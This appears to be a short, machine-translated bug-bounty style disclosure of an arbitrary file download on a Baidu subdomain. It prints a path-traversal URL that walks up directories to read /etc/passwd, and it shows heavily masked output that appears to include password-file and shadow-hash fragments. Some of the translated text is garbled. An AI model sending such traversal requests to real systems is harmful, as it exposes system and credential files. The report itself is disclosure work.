Arbitrary File Download from a Baidu website
Punch
Http://youxi.baidu.com/?demo/demo.jspi guess this page should be confidential
Mask Region
*****?? ******************************?? PO ********************* y = 27dccf180116259d89d ************** ******?? Request? * ****************** E0736700serverId = 1 ***************** *** 2017610124382461e60002, then? ********************? ************* *******?? The MD5 value is (convert all to big? *****
http://youxi.baidu.com/developerDemo/demoDownload.jsp?file=../../../../../../../../../../../../../../../etc/passwd
Mask Region
*****:/root:/**********bin:/sbi**********:/sbin:/sb**********r/adm:/sb**********ool/lpd:/s**********:/sbin:/**********wn:/sbin:/s**********:/sbin:/**********/spool/mail**********spool/uucp:/**********tor:/root:/**********/usr/games:**********var/gopher:/**********ser:/:/sb**********body:/:/s**********memory owner:/d**********r":/var/empty/**********pool/postfix**********d SSH:/var/empty**********/var/cache/rpc********** User:/var/lib********** NFS User:/var/li**********/ntp:/sbi**********::/:/sbi**********be used by OProfile:/**********sage bus:/:/********** daemon:/:/**********ck:/var/run/avahi-**********aemon:/:/s**********home/work**********ool/exim:/s**********ome/www:/**********ome/memcache*****
Mask Region
*****HB5G3fhT5qungLhmNI8Neu21N5UnQ**********:0:999**********3:0:999**********:0:999**********0:9999**********3:0:99**********513:0:9**********3:0:99**********3:0:99**********3:0:99**********513:0:9**********:0:9999**********3:0:999**********:0:999**********3:0:999**********5734:**********:15734**********15734:**********5734:**********4:0:99**********15734:**********!:1573**********734::**********15734:**********:15734**********5734:**********!:1573**********15734**********5734:**********:0:9999**********6653:**********1:0:99**********671:0:99*****